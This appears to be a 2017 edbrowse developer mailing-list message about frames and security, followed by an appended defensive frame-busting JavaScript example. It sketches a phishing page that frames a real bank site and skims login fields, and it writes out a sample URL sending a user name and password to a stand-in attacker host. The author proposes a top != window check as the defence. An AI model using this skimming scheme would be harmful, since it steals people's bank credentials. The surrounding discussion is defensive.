To: Edbrowse-dev@lists.the-brannons.com
From: Karl Dahlke
Reply-to: Karl Dahlke
User-Agent: edbrowse/3.7.0+
Date: Wed, 09 Aug 2017 23:57:48 -0400
Message-ID: <20170709235748.eklhad@comcast.net>
Subject:
[Edbrowse-dev] frames and security

So if I had an email server in China that spewed out millions of phishing emails each day, I could have those emails direct the user to a false site that was a blank window with a frame inside, and that frame brings up Bank of America.com.

This isn't a fake Bank of America site with copies of their logos and a perfect reproduction, no, it's their real site with the up to date images and even the personal picture that you selected, that goes with your cookie and your account, that comes up for security so you know it's the real site. But it's under my frame.

You start to log in, you put in your user name and password, and before you can press submit, my javascript is dipping into the Bank of America objects every quarter second, specifically the values of the input fields of the form. Before you can log in my javascript captures your user name and password, and it sends them to me. How? By putting them as search on an http request to my website, which js can do.

https://my.china.site.com/boa?user=username&pass=password

Isn't that all entirely doable, on any browser, including (perhaps) edbrowse?

I can only think of one defense against this. In a hierarchy of frames, parent points to the frame above you, the frame that contains you, and top points to the top window that started it all, or at least that's how I think it's supposed to work. So Bank of America, and every site that deals with critical information, should check

if(top != window) {
Replace the entire page with a warning that this page cannot be a frame in a larger page, and you are visiting a false site that is trying to jack your account information, and you should be more careful what you click on in your emails.
}

That's all I can think of.

Anyways, this is a long story to note that edbrowse now has parent and top as described above. It was only 12 lines of code, so I like that.

On another note, I'm not entirely sure I set the right frame on various commands. If you click a button or hyperlink or anything that runs js, do I take the time to set the context according to the frame you're in? I'm not sure... Maybe these are things I should have checked before 3.7.0, but I imagine 3.7.1 will come soon enough, with these kinds of bug fixes, and the new autoexpansion of frames, which should make more sites accessible.

Are there still a couple of months before the distros put their packages together? I imagine they are all independent of each other, so maybe that's a silly question. We just plug away as we can.

Karl Dahlke
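The `top != window` check described in the message, as an added example that is not code from the message or from edbrowse: a frame-busting guard written as pure functions over a window-like object, so it runs outside a browser (`makeWindow` is a constructed stand-in for the browser's `window`; in a page you would call `guardPage(window, document)`). It also covers the case where reading `top` throws because the enclosing page is cross-origin.

```javascript
// Added example (not from the message or edbrowse): frame-busting guard.
// `win` is a window-like object with self/parent/top, as in a browser.

const FRAMED_WARNING =
  'This page cannot be displayed as a frame inside a larger page. ' +
  'You may be on a site trying to capture your account information.';

// True when `win` is not the top-level browsing context. Reading `top` of a
// cross-origin ancestor can throw in real browsers; that case is treated as
// framed too, since only an enclosing page can cause it.
function isFramed(win) {
  try {
    return win.top !== win.self;
  } catch (err) {
    return true;
  }
}

// Number of enclosing frames: follow `parent` until it points back at
// itself, which is how the top window is represented.
function frameDepth(win) {
  let depth = 0;
  let cur = win;
  try {
    while (cur.parent !== cur) {
      depth += 1;
      cur = cur.parent;
    }
  } catch (err) {
    return Infinity; // hit a cross-origin ancestor: framed, depth unknown
  }
  return depth;
}

// Replace the page body with the warning when framed; returns whether it did.
function guardPage(win, doc) {
  if (!isFramed(win)) return false;
  doc.body.textContent = FRAMED_WARNING;
  return true;
}

// Constructed stand-in for a browser window; parent === null means top-level.
function makeWindow(parent) {
  const w = {};
  w.self = w;
  w.parent = parent || w;
  w.top = parent ? parent.top : w;
  return w;
}
```

In deployments the same policy is normally also set server-side with a `Content-Security-Policy: frame-ancestors` or `X-Frame-Options` response header, which the browser enforces before any script in the page runs.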